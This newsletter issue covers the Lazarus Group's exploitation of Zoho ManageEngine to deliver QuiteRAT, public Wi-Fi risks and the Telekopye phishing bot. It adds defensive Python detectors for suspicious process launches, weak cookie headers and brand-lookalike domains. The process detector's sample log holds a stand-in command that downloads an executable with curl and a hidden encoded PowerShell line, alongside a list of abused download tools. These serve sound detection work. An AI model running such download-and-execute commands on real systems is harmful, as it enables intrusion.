Exploits on Zoho service desk

Aug 25 2023


Welcome to Gone Phishing, your daily cybersecurity newsletter that’s praying the cybercriminals take this August bank holiday weekend off… to our non-UK readers, tonight is the beginning of a long weekend for us Brits 😎🎉🎉

It’s Friday, folks, which can only mean one thing… It’s time for our weekly segment!!!

It goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it.

Congrats, the cybercriminals are no match… for your patch! Check out these freshly hatched patches!! 🩹🩹🩹

New Juniper Junos OS flaws expose devices to remote attacks! Aw, RATs! Geddit? 😏

🔒 Juniper Networks has urgently released a security update to fix multiple vulnerabilities in the J-Web component of Junos OS.

Individually the flaws are only moderate, but chained together they allow an unauthenticated, network-based attacker to achieve remote code execution. All Junos OS releases on SRX and EX Series devices prior to the fixed versions are affected, and Juniper scores the combined chain at CVSS 9.8.

🔧 Fix and Workaround: Juniper has patched the vulnerabilities in updated Junos OS releases for both EX Series and SRX Series devices, and users should apply them promptly. Where patching has to wait, disable J-Web entirely or restrict J-Web access to trusted management hosts only.

Stay secure by keeping your systems up-to-date! 🛡️💻🔐Patch NOW, or forever hold your peace 😂😂😂

But wait, there’s more…

Now, on to today’s hottest cybersecurity stories:

  • 💀 Lazarus returns to exploit Zoho ManageEngine flaw with ‘QuiteRAT’ malware 👾

  • 👤‘Man-in-the-Middle’: Beware of the untold perils of public wifi 🌐

  • ✉️ New Telegram bot "Telekopye" fuels industrial-scale phishing scams from Russia 🌎

Users: Zoh-no! 😲

Hackers: Mmm, ‘Quite’ 😈

🔒 Lazarus Group Exploits Zoho ManageEngine Flaw 🔒

The notorious North Korea-linked hacker group, Lazarus Group, has been observed leveraging a recently patched critical security vulnerability in Zoho ManageEngine ServiceDesk Plus.

The exploit has been used to deliver a remote access trojan named QuiteRAT. Cisco Talos, Cisco's threat intelligence unit, reports that the group's targets include internet backbone infrastructure and healthcare organisations in Europe and the U.S.

The same analysis also turned up a previously unknown implant, CollectionRAT, hosted on attack infrastructure that Lazarus Group has reused from earlier campaigns.

🌐 Despite years of public documentation, Lazarus Group keeps reusing the same tactics, a sign of how confident it is. QuiteRAT, the successor to MagicRAT, offers similar capabilities in a much smaller file. Like its predecessor it is built on the Qt framework, which adds complexity to the code and hampers analysis.

The activity, spotted in early 2023, exploited CVE-2022-47966 only five days after a public proof-of-concept appeared, and used the resulting code execution to fetch QuiteRAT from an attacker-controlled URL.

🔄 QuiteRAT is a slimmed-down evolution of MagicRAT: smaller, and with no built-in persistence, so the operators must issue a command from the C2 server if they want the implant to keep running after a reboot. Lazarus Group is also leaning more heavily on open-source tooling for initial access, including the Go-based DeimosC2 framework.
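An added worked example, not from the newsletter or from Cisco Talos' write-up: when a web-facing Java application such as ServiceDesk Plus is exploited, the tell-tale on the host is the application's Java process spawning a shell or a download tool, which is exactly what "fetching a RAT from a URL" looks like in process-creation logs. The detection below runs over constructed Sysmon-style events; the install path of the Java binary, the URL and the file names are assumptions, not indicators from the real campaign.

```python
"""Flag a web application's Java process spawning a shell or download tool.

Added example, not from the newsletter or Cisco Talos: the log lines below are
constructed Sysmon-style process-creation events (EventID=1). The ServiceDesk
install path, the URL and the file names are assumptions for illustration.
"""
import re
from typing import Dict, List

# Constructed sample events: one benign shell, one benign child of the Java
# process, and two that look like post-exploitation of the web application.
SAMPLE_EVENTS = r"""
2023-02-13T10:14:58Z EventID=1 ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe"
2023-02-13T10:15:01Z EventID=1 ParentImage="C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe" Image="C:\Windows\System32\conhost.exe" CommandLine="\??\C:\Windows\system32\conhost.exe 0x4"
2023-02-13T10:15:02Z EventID=1 ParentImage="C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe" Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe /c curl http://example.invalid/x -o C:\Windows\Temp\x.exe"
2023-02-13T10:15:09Z EventID=1 ParentImage="C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -nop -w hidden -enc AAAA"
"""

# Parent processes that should never need a shell: the Java runtime serving the
# web application (assumed path: the product's bundled jre\bin\java.exe).
WEB_APP_PARENTS = re.compile(r"\\ManageEngine\\.*\\javaw?\.exe$", re.IGNORECASE)

# Children worth alerting on when spawned by such a parent.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
}

# key=value pairs; quoted values may contain spaces.
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'timestamp key=value key="value with spaces"' line into a dict."""
    timestamp, _, rest = line.partition(" ")
    fields = {"Timestamp": timestamp}
    for key, raw, quoted in FIELD_RE.findall(rest):
        fields[key] = quoted if raw.startswith('"') else raw
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_web_app_shells(log_text: str) -> List[Dict[str, str]]:
    """Return the process-creation events in which the web application's Java
    process spawned a command interpreter or a download utility."""
    hits = []
    for line in log_text.strip().splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue
        if WEB_APP_PARENTS.search(ev.get("ParentImage", "")) and \
                basename(ev.get("Image", "")) in SUSPICIOUS_CHILDREN:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for hit in find_web_app_shells(SAMPLE_EVENTS):
        print(hit["Timestamp"], basename(hit["Image"]), hit["CommandLine"])
```

The conhost.exe child is deliberately left out of the alert set: Java spawning a console host is routine, whereas Java spawning cmd.exe that runs curl, or a hidden encoded PowerShell, almost never is. On a real estate the parent-path pattern would be widened to every Java-based application exposed to the internet.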

CollectionRAT gathers system metadata, runs arbitrary commands and delivers further payloads; how it is being distributed has not yet been established.

🔑 Lazarus Group's shift towards new tactics and weaponizing disclosed software vulnerabilities highlights its expanding and evolving malicious strategies.

Stay vigilant against emerging threats! 🛡️🔍🚫

I came across ZZZ Money Club during the crypto market bull run, when everyone’s a winner. Even during the bear market, this Discord group has been amazing at giving information on projects and ways to make passive income in various ways.

The group is very active and everyone in this private discord group is very chatty and helpful.

It’s run by Yourfriendandy and Decadeinvestor, who you can find here on YouTube, both top guys with great content.

If you are interested in joining the group, you can do so through the link below.

I'm starting with the Man-in-the-Middle 🎶

I'm asking him to change his ways 😂

📶 Public Wi-Fi: Convenience vs. Risks 🛡️

Public Wi-Fi, now a common convenience, brings risks for both individuals and businesses. As remote work grows, working from cafes, hotels, or airports is popular. But let's explore the dangers.

🔒 Risks for Individuals:

  • Most people connect to open networks that need no password, and on such a network an attacker can read whatever other users send unencrypted.

  • Man-in-the-Middle attacks: Hackers intercept data between users and websites.

  • Eavesdropping: Hackers listen to unencrypted data.

  • Rogue Hotspots: Fake networks capture sensitive data.

  • Spoofing: Hackers impersonate a trusted device on the network (the access point, the gateway or the DNS server) to redirect or alter traffic.

  • Session Hijacking: Attackers steal login sessions.

💼 Business Concerns:

  • Businesses face similar threats on public Wi-Fi.

  • Attackers target sensitive business data.

  • Honeypot Networks: Fake networks lure and infect users.

  • Malware Distribution: Hackers use Wi-Fi to spread malware.

  • Login Page Phishing: Fake login pages steal credentials.

🛡️Top Tips:

For Wi-Fi Owners: Use web filtering and DNS services to protect users.

For Users: Use a DNS filtering service, avoid banking and other sensitive sites, turn off file and printer sharing, and make sure every site you do use is served over HTTPS.
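As an added example, not part of the original article: two response headers largely decide whether a logged-in session can be hijacked by someone sharing your Wi-Fi, Strict-Transport-Security (so the browser never makes a plaintext request to the site) and the Secure attribute on the session cookie (so the cookie is never sent over one). The function below audits a set of response headers for both. The headers are constructed for a hypothetical site, not captured from a real service.

```python
"""Check whether a site's response headers keep a session safe on hostile Wi-Fi.

Added example, not from the newsletter: SAMPLE_HEADERS is a constructed
response from a hypothetical site, not captured from any real service.
"""
from typing import Dict, List, Tuple

Header = Tuple[str, str]

# Constructed sample: HSTS is missing and one of the two cookies lacks Secure.
SAMPLE_HEADERS: List[Header] = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "sessionid=9f3c1e0a; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "remember_me=1; Path=/; Expires=Wed, 25 Oct 2023 12:00:00 GMT"),
]


def parse_set_cookie(value: str) -> Tuple[str, Dict[str, str]]:
    """Split 'name=value; Attr; Attr=val' into the cookie name and a lower-cased
    attribute map. Flag attributes such as Secure map to an empty string."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def hsts_max_age(headers: List[Header]) -> int:
    """Return the HSTS max-age in seconds, or 0 if the header is absent."""
    for name, value in headers:
        if name.lower() == "strict-transport-security":
            for directive in value.split(";"):
                key, _, val = directive.strip().partition("=")
                if key.strip().lower() == "max-age" and val.strip().isdigit():
                    return int(val)
    return 0


def audit_session_protection(headers: List[Header]) -> List[str]:
    """Return human-readable findings; an empty list means nothing to report."""
    findings = []
    if hsts_max_age(headers) == 0:
        findings.append("no Strict-Transport-Security header: a first request over "
                        "http:// can be intercepted and the session downgraded")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if "secure" not in attrs:
            findings.append(f"cookie {cookie!r} lacks Secure: it will be sent in "
                            "clear text on any http:// request")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie!r} lacks HttpOnly: readable by injected script")
    return findings


if __name__ == "__main__":
    for finding in audit_session_protection(SAMPLE_HEADERS):
        print("-", finding)
```

Against the constructed headers this reports three problems: no HSTS, and the remember_me cookie missing both Secure and HttpOnly. That cookie is the one a rogue hotspot would harvest the moment the browser follows any http:// link to the site.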

In short, while public Wi-Fi is handy, its vulnerabilities demand caution. Stay safe with protective steps! 🌐🔒💼

🗞️ Extra, Extra! Read all about it! 🗞️

Each fortnight, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 💰The Crypto Nutshell: Crypto News & Expert Predictions all in a nutshell 💪

  • 📈The Breakthrough: Receive one idea, one question, and one exercise each week that could spark your next breakthrough.

  • ✈️ViaTravelers: Get exclusive travel tips, news, and insider deals right in your inbox.

Let us know what you think!

That’s not Telegramatically correct 🙃

🤖 New Telegram Bot Scam Alert! 🚫

Beware of a fresh financial scam operation using a malicious Telegram bot named Telekopye.

The toolkit helps scammers create phishing web pages and send deceptive URLs to potential victims, dubbed Mammoths. This bot streamlines phishing with easy-to-use menus for scammers.

📡 The Setup: The threat actors, called Neanderthals, are suspected to originate from Russia, employing the Telekopye bot to craft and send fake links to Mammoths via email, SMS, or DMs.

Victims are tricked into entering payment details on sham credit/debit card gateways, leading to fund theft, which is then laundered through cryptocurrencies.

🕵️ Features & Tactics:

Telekopye is a full toolkit: it generates phishing emails, web pages, SMS messages, QR codes and realistic images on demand. The phishing domains are chosen to mimic legitimate brand URLs so that victims do not look twice. Notably, payouts are centralised, which lets the Telekopye administrators oversee what every Neanderthal is doing.
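An added example, not from the newsletter or from the ESET research it summarises: a small classifier for the brand-mimicking domains described above. It flags the brand appearing as a subdomain of an unrelated registrable domain, the brand embedded in the registrable label, homoglyph substitutions (rn for m, 1 for l, 0 for o) and one-character typos. The brand and every domain below are constructed under the reserved .example and .test TLDs, and the "last two labels" rule for the registrable domain is a simplification that ignores multi-part public suffixes such as co.uk.

```python
"""Classify domains that mimic a brand, as phishing kits do.

Added example, not from the newsletter or ESET. BRANDS and SAMPLE_DOMAINS are
constructed; registrable() is a deliberate simplification (last two labels)
that does not handle multi-part public suffixes such as co.uk.
"""
from typing import Dict, List, Optional

# Constructed brand list: brand keyword -> the domain that legitimately owns it.
BRANDS: Dict[str, str] = {"examplepay": "examplepay.example"}

# Common character substitutions that make a lookalike read like the brand.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

# Constructed candidates: two legitimate, four lookalikes, one unrelated.
SAMPLE_DOMAINS = [
    "examplepay.example",
    "login.examplepay.example",
    "examplepay.example.secure-checkout.test",
    "examplepay-verify.test",
    "exarnplepay.test",
    "examplpay.test",
    "news.test",
]


def registrable(domain: str) -> str:
    """Return the last two labels, e.g. 'foo.test' for 'a.b.foo.test'."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def normalise(label: str) -> str:
    """Undo confusable substitutions so 'exarnp1epay' reads 'examplepay'."""
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance; labels are short, so the O(len(a)*len(b)) DP is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str, brands: Dict[str, str] = BRANDS) -> Optional[str]:
    """Return the lookalike technique detected, or None when the domain is
    unrelated to every brand or is the brand's own domain (or a subdomain)."""
    domain = domain.lower().strip(".")
    labels = domain.split(".")
    reg_label = registrable(domain).split(".")[0]
    for brand, legit in brands.items():
        if domain == legit or domain.endswith("." + legit):
            return None
        if brand in labels:            # brand is a whole label under someone else's domain
            return "brand_in_subdomain"
        if brand in reg_label:         # e.g. brand-verify.test
            return "brand_embedded"
        if normalise(reg_label) == brand:
            return "homoglyph"
        if levenshtein(reg_label, brand) <= 1:
            return "typosquat"
    return None


def scan(domains: List[str]) -> Dict[str, str]:
    """Map each flagged domain to the technique detected."""
    return {d: verdict for d in domains if (verdict := classify(d)) is not None}


if __name__ == "__main__":
    for domain, verdict in scan(SAMPLE_DOMAINS).items():
        print(f"{domain:45} {verdict}")
```

The order of the checks matters: the legitimate-domain test comes first so that real subdomains are never flagged, and the homoglyph test runs before the edit-distance test because a confusable swap is a stronger signal than a random typo. Feeding newly registered domains or a certificate-transparency stream through scan() is the usual way to catch kit-generated domains before the first Mammoth clicks one.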

💼 Hierarchical Scammers:

The scam network is organised into roles – Blocked, Workers, Good Workers, Moderators and Administrators. Good Workers and Administrators enjoy higher privileges, and the workers rely on carefully scripted language to pressure victims into paying.

Top Tips:

To avoid falling victim, insist on in-person transactions, be cautious with online marketplaces, and never send money without assurance. As scams evolve, vigilance remains essential. 🚨🛡️

So long and thanks for reading all the phish!
